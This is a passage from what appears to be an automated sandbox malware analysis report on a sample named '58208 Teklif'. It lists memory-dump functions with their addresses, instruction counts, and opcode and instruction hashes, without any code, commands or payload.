                                                      • Opcode Fuzzy Hash: aa239a77b331ddf430cc52f4646023f360902226f79d8b7dafd13c94ae795c71
                                                      • Instruction Fuzzy Hash: 9601E871E4021A8FDF54EFBA98006AEB7B1BF88201F04856AD519E7254E7345A01CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9BB0 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f07ac73e1c2c65091097f387f9bec3def10b2627d002a693c9d4d31d1587ba7
                                                      • Instruction ID: 19c3af3fac574859da29dddd4955e46270cdedf6d5be905f30ce0ccd4583ab2e
                                                      • Opcode Fuzzy Hash: 6f07ac73e1c2c65091097f387f9bec3def10b2627d002a693c9d4d31d1587ba7
                                                      • Instruction Fuzzy Hash: D9F089363001196F8F059E99AC549AF7FABEFC8260B004829FA05D7350DF31581197A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01412078 Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ab370aad0c29efbe3b4555971c12de8ca10abc9ee7f2954e65e753f2b6c502e
                                                      • Instruction ID: 9881684e2ac1c203c46f0e201e92faa7cd433983539ecb409d52f3263c0f21e1
                                                      • Opcode Fuzzy Hash: 9ab370aad0c29efbe3b4555971c12de8ca10abc9ee7f2954e65e753f2b6c502e
                                                      • Instruction Fuzzy Hash: 84D05B31D2022B57CB00E7A5DC044EFF738EED5265B908626D55437140FB702659C7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014182B8 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                      • Instruction ID: ee005fc22bcbed56603096751db5c540d2c5c072dce6ee7c02f7f3c9949f4aa8
                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                      • Instruction Fuzzy Hash: 9CC08C7320C52C2AA236508E7C40EE3BB8CC3C13B4B250237F91CE3352A8539C8101F8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141A76D Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27a7ee2d533ce0c7af1f4449bebfe1935ae1fc4f0452399e34a5b9d1b2808e4e
                                                      • Instruction ID: debc079fb50e727ea0adcff766d88b55a3e22fa13751a75d923520711be7458c
                                                      • Opcode Fuzzy Hash: 27a7ee2d533ce0c7af1f4449bebfe1935ae1fc4f0452399e34a5b9d1b2808e4e
                                                      • Instruction Fuzzy Hash: E7D0677BB410189FCB049F9DE880CDDB7B6FB9C221B448526E925A3261C631A961DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01415F10 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac98d6001b08c339bfefe3c45a96de53a4ed0db1f99f049a9e79a90f07eeb12b
                                                      • Instruction ID: 73f678e9f20341af483fa3f3ef5a53d5ac2816697a266b765d5e04e4b8cdf69b
                                                      • Opcode Fuzzy Hash: ac98d6001b08c339bfefe3c45a96de53a4ed0db1f99f049a9e79a90f07eeb12b
                                                      • Instruction Fuzzy Hash: 55C0127058430B4FC601F777FA4665A77AAB7C0300F404A74B1090E12DDF7468498691
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 06BD2D05 Relevance: 11.7, Strings: 9, Instructions: 460COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$PH_q$PH_q$PH_q$PH_q$PH_q$PH_q$PH_q$PH_q
                                                      • API String ID: 0-1516622243
                                                      • Opcode ID: ef7bb97e16306b122e7d1ccfefff973312f48f749bd5d36ea7609241c5612290
                                                      • Instruction ID: ca63766dccc63e82f055ced269286fddf20f6455be443105bda9be58836b22fa
                                                      • Opcode Fuzzy Hash: ef7bb97e16306b122e7d1ccfefff973312f48f749bd5d36ea7609241c5612290
                                                      • Instruction Fuzzy Hash: F9329DB4E01218CFDB68DF69C994B9DBBF2BB89300F1084A9D409AB365DB715E85CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141EA08 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .5wq
                                                      • API String ID: 0-74813169
                                                      • Opcode ID: 713c55926f8d85a518f81905574caada626b69efd3e7bf737952a53547d066ec
                                                      • Instruction ID: 441d8fc45df940640b83fba61911dbd5b536fd43a82095adad68380b53dbd252
                                                      • Opcode Fuzzy Hash: 713c55926f8d85a518f81905574caada626b69efd3e7bf737952a53547d066ec
                                                      • Instruction Fuzzy Hash: 7E528F74E01229CFDB64DF69C994B9DBBB2BB89300F1085EAD409A7364DB319E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A90040 Relevance: .7, Instructions: 709COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fdf7dd8e0c70e61674ec487caf0fcf2ab76016534b5f074e4a75addc3cfad05c
                                                      • Instruction ID: 7d6594bec08e1da19a339bf31154ac326208b9a1986e8413a09bf255771f38ac
                                                      • Opcode Fuzzy Hash: fdf7dd8e0c70e61674ec487caf0fcf2ab76016534b5f074e4a75addc3cfad05c
                                                      • Instruction Fuzzy Hash: D772BD74E012298FDB68DF69C994BEDBBF2BB49300F1091E9D409A7255DB30AE81CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9C9B8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56aac6d10afb0c6a67ba813d55b326d5a9edd34deef2a04bb8787e53f5abe483
                                                      • Instruction ID: 0f4c2b66988662c95cff3023a37b04f94975b24d41a9e3a2938b1f128af041f6
                                                      • Opcode Fuzzy Hash: 56aac6d10afb0c6a67ba813d55b326d5a9edd34deef2a04bb8787e53f5abe483
                                                      • Instruction Fuzzy Hash: B0C1A074E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9F980 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44ffce25f542de4723e2562b5a87941a269893ab7617cb004f20f83749a25484
                                                      • Instruction ID: d390d5fa49839fb86050565b0c98b11c495b3e7b8d170b8a8ed9ab158c91a27f
                                                      • Opcode Fuzzy Hash: 44ffce25f542de4723e2562b5a87941a269893ab7617cb004f20f83749a25484
                                                      • Instruction Fuzzy Hash: 2FC1A074E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A91980 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39b24e5434065a8421402ba2c57f825a0ae23e3f14a42c1b09be40ae558d1b98
                                                      • Instruction ID: a6d58e613c92a0f33699b92d82e9a11fc127422c2f829beefa3ffb07303f5141
                                                      • Opcode Fuzzy Hash: 39b24e5434065a8421402ba2c57f825a0ae23e3f14a42c1b09be40ae558d1b98
                                                      • Instruction Fuzzy Hash: 45C1B074E01219CFDB14DFA5D994B9DBBB2BF89300F1095A9D809AB358DB345A85CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A91DE0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7422e2b92aff0f58a16edb79da5dea165bd9056cc26f6bc7c1e9b92c15d52c34
                                                      • Instruction ID: 2a47525da5f10fa4f951f63301c39e873dc9ba607406bf98f761e982a71a3917
                                                      • Opcode Fuzzy Hash: 7422e2b92aff0f58a16edb79da5dea165bd9056cc26f6bc7c1e9b92c15d52c34
                                                      • Instruction Fuzzy Hash: 20C1B078E01218DFDB14DFA5D994B9DBBB2BF89300F2091A9D809AB364DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9F528 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00c31e4d27d6cafd0bfa957273fae02499a72007fa3f38432de11bf87a31ca40
                                                      • Instruction ID: 4d6345716179e471a6dff857eb5013366f64011822bfeb97e7016e8f8e7ed51b
                                                      • Opcode Fuzzy Hash: 00c31e4d27d6cafd0bfa957273fae02499a72007fa3f38432de11bf87a31ca40
                                                      • Instruction Fuzzy Hash: 88C1B174E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A91520 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 897da2000a774fc3fcb4f9aea054fe82ed57cb9f5dd67c7a6a2972cda10413ff
                                                      • Instruction ID: 88eae0ac497b9cd6381d0c6fe3b129ad8f144ca6b5161cadfc1be449b430dac6
                                                      • Opcode Fuzzy Hash: 897da2000a774fc3fcb4f9aea054fe82ed57cb9f5dd67c7a6a2972cda10413ff
                                                      • Instruction Fuzzy Hash: 74C1B078E01219CFDB14DFA5D994B9DBBF2BF89300F1095A9D809AB368DB345A85CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9C108 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a00ecf8ed3d325ca58d7569f081ca04e5b5b1eb825ddfb3441219d2f3c533506
                                                      • Instruction ID: 01db9a0f1e595905371b722e2962fb0d5351f67b5f4d7eb17e7de2b26e7a271c
                                                      • Opcode Fuzzy Hash: a00ecf8ed3d325ca58d7569f081ca04e5b5b1eb825ddfb3441219d2f3c533506
                                                      • Instruction Fuzzy Hash: 23C19174E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9C560 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 971186cad680d6dcffe9915101f2a008ecab21f4a6bfbe87d2ed1ee3635e81fd
                                                      • Instruction ID: 3d5937fe283e54dda2c3ab9594987b9b79ee5547e212655b9a3e3908669c253b
                                                      • Opcode Fuzzy Hash: 971186cad680d6dcffe9915101f2a008ecab21f4a6bfbe87d2ed1ee3635e81fd
                                                      • Instruction Fuzzy Hash: 1FC1B074E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A910C0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8990922fd6b391a4edb6951ef2ca59df8d210025fd5647545b446d8a12edd6c8
                                                      • Instruction ID: d0cf893cc97cd7670c507085620087eab66bbda0b0cee6b7f4f2cefe77906168
                                                      • Opcode Fuzzy Hash: 8990922fd6b391a4edb6951ef2ca59df8d210025fd5647545b446d8a12edd6c8
                                                      • Instruction Fuzzy Hash: 32C1B074E01219CFDB14DFA5D994B9DBBF2BF89300F2095A9D809AB364DB345A85CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9F0D0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 723fba1e350012a4dd7f2e2df8de5affee51d4159cf008eb3655ed502a31e4b4
                                                      • Instruction ID: 8afa3429b7d51d664c40cd1dce6a06538389838d775e8f60f124312e83c47167
                                                      • Opcode Fuzzy Hash: 723fba1e350012a4dd7f2e2df8de5affee51d4159cf008eb3655ed502a31e4b4
                                                      • Instruction Fuzzy Hash: 48C19074E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9E820 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 810ad37b8130ebb92eb29080880c1706ee3453e0bec512e4b4d3089468389245
                                                      • Instruction ID: 8af74e5e0290964874398578b0a0731d3f35c0e131d019feb048d59dbbe1ff97
                                                      • Opcode Fuzzy Hash: 810ad37b8130ebb92eb29080880c1706ee3453e0bec512e4b4d3089468389245
                                                      • Instruction Fuzzy Hash: 0DC1BF74E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB369DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A90C60 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c624237e06c1cd110fb5ea93f71bb3ceb6a57a5c273dff7e29c8a9ddcee496c7
                                                      • Instruction ID: d66997f09e70f0173009fcac2901cb0b4f77b465e52813b2880a9002cf1702aa
                                                      • Opcode Fuzzy Hash: c624237e06c1cd110fb5ea93f71bb3ceb6a57a5c273dff7e29c8a9ddcee496c7
                                                      • Instruction Fuzzy Hash: C8C1B178E01218CFDB14DFA5D994B9DBBB2BF89300F1095A9D809AB364DB355E85CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9EC78 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dadabca2471ea0b1de173fea2a4819b5f385f360bef402d79f2eba846dd93a45
                                                      • Instruction ID: f38c8d79f516cda435ff10a2df940e9022971ad6ae350b59b16741a2d31ba839
                                                      • Opcode Fuzzy Hash: dadabca2471ea0b1de173fea2a4819b5f385f360bef402d79f2eba846dd93a45
                                                      • Instruction Fuzzy Hash: 57C1B174E01228CFDB18DFA5C994B9DBBB2BF89300F1091A9D409AB369DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9E3C8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0085ac363dc333a9a696b43b148aef22a3d4c4b5149326356922daacd15be823
                                                      • Instruction ID: 22d0f76df7b5b401c72a33e227f28a7f8ff4e431c727017d57a1341042d698e2
                                                      • Opcode Fuzzy Hash: 0085ac363dc333a9a696b43b148aef22a3d4c4b5149326356922daacd15be823
                                                      • Instruction Fuzzy Hash: 96C1B074E01228CFDB18DFA5C994B9DBBB2BF89300F1091A9D409AB369DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9DB18 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f676be50db1213859657932587bc67f1b90c572a38fb39612a9b075b10b0e4d
                                                      • Instruction ID: 37e71541a7447d9c41314da8e81a051f11fe047ed5d32ca02cdac69d3eff3484
                                                      • Opcode Fuzzy Hash: 3f676be50db1213859657932587bc67f1b90c572a38fb39612a9b075b10b0e4d
                                                      • Instruction Fuzzy Hash: F8C1A174E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9DF70 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fa6105783dbe820e371dfcc452d947b12a61588cd4a2445c31230368e9e914c
                                                      • Instruction ID: 291372e6abe29530a5f4699d38e1c486dccbde6cf23230623bd39730a34280ce
                                                      • Opcode Fuzzy Hash: 8fa6105783dbe820e371dfcc452d947b12a61588cd4a2445c31230368e9e914c
                                                      • Instruction Fuzzy Hash: D7C1B174E01228CFDB18DFA5C994B9DBBB2BF89300F1081A9D409AB369DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9D6C0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13f44f5be001c84c733024f8b3066f82c889722690026364e37dd7d8700733be
                                                      • Instruction ID: 7411e7d17834b0414e74f869ac70ee6f8e70c432b64730772787b27be55933d7
                                                      • Opcode Fuzzy Hash: 13f44f5be001c84c733024f8b3066f82c889722690026364e37dd7d8700733be
                                                      • Instruction Fuzzy Hash: 08C1BF74E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9CE10 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e9a5619f671cb02f0ce58d26e87af1f3570dd0f9e2ac361b4c361bc0ccf7159
                                                      • Instruction ID: 62ad3fb775408b3eeba2ca89649ff702e2e01a0515e14d0847713f06f419b313
                                                      • Opcode Fuzzy Hash: 5e9a5619f671cb02f0ce58d26e87af1f3570dd0f9e2ac361b4c361bc0ccf7159
                                                      • Instruction Fuzzy Hash: 4CC1A174E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9D268 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19c39ca848a5bcb3b6519a18ba222158e1952d5aa215fc3352a04024c1f3b886
                                                      • Instruction ID: 7419b946d357c65f5b90951995a6ae6edb41f0b1a61e33445d051b9edfd1320a
                                                      • Opcode Fuzzy Hash: 19c39ca848a5bcb3b6519a18ba222158e1952d5aa215fc3352a04024c1f3b886
                                                      • Instruction Fuzzy Hash: DBC1A174E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD5EC0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e81c16cc17ff36ed71f081b7b366b1a77ebdd8791b3ff7bb02a5e6dffef8491c
                                                      • Instruction ID: d6b6039ab1889b33cc9a0d30f0c243ff180c7ce4aa7fa7648a275e07145588fa
                                                      • Opcode Fuzzy Hash: e81c16cc17ff36ed71f081b7b366b1a77ebdd8791b3ff7bb02a5e6dffef8491c
                                                      • Instruction Fuzzy Hash: 94C1C174E01218CFDB54DFA5D994B9DBBB2BF89300F2091A9D408AB368EB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD8600 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb8b736936f4220a5913331f7be78c2dc058823d2ce435ba5af54a7dfb002d17
                                                      • Instruction ID: 7930f3c813e5e816515a83f263e6865fd3cdac579cc53280e56b55d4849ae029
                                                      • Opcode Fuzzy Hash: fb8b736936f4220a5913331f7be78c2dc058823d2ce435ba5af54a7dfb002d17
                                                      • Instruction Fuzzy Hash: 0EC1D074E01218CFDB54DFA5C994BADBBB2BF89300F2091A9D408AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD5A68 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
